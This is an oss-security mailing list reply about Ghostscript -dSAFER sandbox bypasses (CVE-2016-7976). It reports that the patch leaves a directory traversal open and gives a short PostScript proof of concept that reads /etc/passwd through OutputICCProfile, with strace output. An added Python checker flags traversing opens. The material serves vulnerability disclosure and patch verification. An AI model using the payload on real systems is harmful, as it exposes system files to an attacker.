oss-sec mailing list archives
Re: Re: CVE Request - multiple ghostscript -dSAFER sandbox problems
From: Cedric Buissart <cbuissar () redhat com>
Date: Wed, 19 Oct 2016 16:29:43 +0200
On Wed, Oct 5, 2016 at 8:04 PM, <cve-assign () mitre org> wrote:
> bug: various userparams allow %pipe% in paths, allowing remote shell command execution.
> id: http://bugs.ghostscript.com/show_bug.cgi?id=697178
> repro: http://www.openwall.com/lists/oss-security/2016/09/30/8
> patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=71ac87493b1e445d6c07554d4246cf7d4f44875c
>
> Use CVE-2016-7976.
>
> There currently isn't a separate CVE ID for the earlier impact that
> occurred when "b" was in the mode argument to popen. The question of
> whether popen will execute anyway (even with the 'b' character) is,
> more or less, a reachability concern in this context, and doesn't mean
> that a second vulnerability needs to be defined.

The original report for this bug (http://bugs.ghostscript.com/show_bug.cgi?id=697178), as described by Florian, was mentioning a directory traversal issue.
The directory traversal does not appear to be resolved after applying the given patch :

$ cat putdevice-open.ps
%!PS
currentdevice null true mark /OutputICCProfile (../../../../../etc/passwd)
.putdeviceparams
quit

$ strace -f -e open gs -dSAFER putdevice-open.ps |& grep passwd
open("/usr/share/ghostscript/9.20/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 6

Is it expected ?

--
Cedric Buissart,
Product Security
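
An added example, not part of the original message: a Python check that scans strace open()/openat() lines like the one above and flags paths that begin under the ICC profile directory but normalize outside it, which is one way to confirm whether a patched build still resolves the traversal. The function names are assumptions, and every sample line except the first is constructed.

```python
import posixpath
import re

# Path argument of open()/openat() as printed by strace, with the optional
# "[pid N] " prefix that -f adds and the optional dirfd argument of openat().
OPEN_RE = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?(?:open|openat)\((?:[^,"]+,\s*)?"((?:[^"\\]|\\.)*)"'
)

def escapes_base(path, base):
    """True if path starts under base but lexically normalizes outside it.

    Lexical check only: symlinks are not resolved, so this catches ../
    sequences such as the one in the message, not symlink-based escapes.
    """
    base = posixpath.normpath(base)
    if not path.startswith(base + "/"):
        return False
    norm = posixpath.normpath(path)
    return not (norm == base or norm.startswith(base + "/"))

def find_traversals(strace_lines, base):
    """Return (raw_path, normalized_path) for each open that escapes base."""
    hits = []
    for line in strace_lines:
        m = OPEN_RE.match(line.strip())
        if m and escapes_base(m.group(1), base):
            hits.append((m.group(1), posixpath.normpath(m.group(1))))
    return hits

BASE = "/usr/share/ghostscript/9.20/iccprofiles"
SAMPLE = [
    # First line is the strace output quoted in the message; the rest are constructed.
    'open("/usr/share/ghostscript/9.20/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 6',
    'open("/usr/share/ghostscript/9.20/iccprofiles/default_rgb.icc", O_RDONLY) = 5',
    '[pid 4242] openat(AT_FDCWD, "/usr/share/ghostscript/9.20/iccprofiles/../iccprofiles/a.icc", O_RDONLY) = 7',
    'open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3',
]

if __name__ == "__main__":
    for raw, norm in find_traversals(SAMPLE, BASE):
        print(f"escapes {BASE}: {raw} -> {norm}")
```

On systems where libc issues openat() instead of open(), the strace filter needs to include openat for the trace to contain these lines.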